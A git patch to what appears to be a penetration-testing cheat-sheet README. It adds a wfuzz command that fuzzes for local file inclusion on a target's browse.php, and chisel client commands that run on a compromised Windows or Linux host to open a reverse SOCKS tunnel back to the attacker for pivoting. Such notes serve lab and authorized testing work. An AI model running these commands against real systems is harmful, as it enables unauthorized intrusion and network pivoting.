From dcdc419adac6b1b92611df99d3af6881d2acaa54 Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Thu, 13 Oct 2022 11:29:51 -0400 Subject: [PATCH] Update README.md --- README.md | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/README.md b/README.md index c2b04ed..62f9210 100644 --- a/README.md +++ b/README.md @@ -333,6 +333,10 @@ directory-list-2.3-medium.txt directory-list-lowercase-2.3-medium.txt ``` +#LFI FUZZ +wfuzz -c -z file,LFI_FUZZ.txt "http://{RHOST}/browse.php?p=source&file=FUZZ" + +
@@ -1491,8 +1495,12 @@ chisel server -p 3477 --socks5 --reverse # RHOST (Windows) - Transfer chisel.exe chisel64.exe client {LHOST}:3477 R:socks + PS> .\chisel64.exe client {LHOST}:3477 R:socks +# RHOST (Linux) - Transfer chisel_lin64 +./chisel_lin64 client {LHOST}:3477 R:socks + # LHOST sudo NMAP -sT -Pn -n {FIREWALLED RHOST}